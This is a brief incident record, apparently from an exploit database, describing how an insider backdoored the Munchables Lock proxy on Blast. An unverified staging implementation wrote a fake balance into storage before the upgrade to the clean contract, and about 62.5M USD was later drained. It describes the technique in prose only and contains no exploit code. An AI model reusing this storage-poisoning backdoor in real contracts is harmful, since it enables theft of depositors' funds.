The Munchables Lock contract was deployed behind an upgradeable proxy (ERC1967-style) by a developer the team later identified as a DPRK-linked insider operating under the alias Werewolves0943. Before the public-facing implementation was set, the rogue developer pointed the proxy at an unverified initial implementation that exposed an owner-only function permitting direct writes to arbitrary storage slots. Using that backdoor, the attacker wrote a deposited-ETH balance of 1,000,000 ether into their own user-balance slot in the proxy's storage, then upgraded the implementation to the clean, public-facing Lock contract. Months later, once TVL had grown to ~17,400 ETH, the attacker simply called the legitimate withdraw path; the new implementation read the pre-planted storage value and released the entire vault. The exploit required no logic bug in the visible production code — the deployed bytecode of the staging implementation and the proxy's upgrade history were the evidence.
Classification: Protocol Logic. Technique: Storage Slot Exploit. Target type: Gaming. Affected chains: Blast. Implementation language: Solidity.
- chain
- blast
- protocol
- Munchables
- bug_class
- logic
- date_occurred
- 2024-03-26
- loss_usd
- $62,500,000
- classification
- Protocol Logic
- technique
- Storage Slot Exploit
- target_type
- Gaming
- language
- Solidity
- source_id
- dl:4369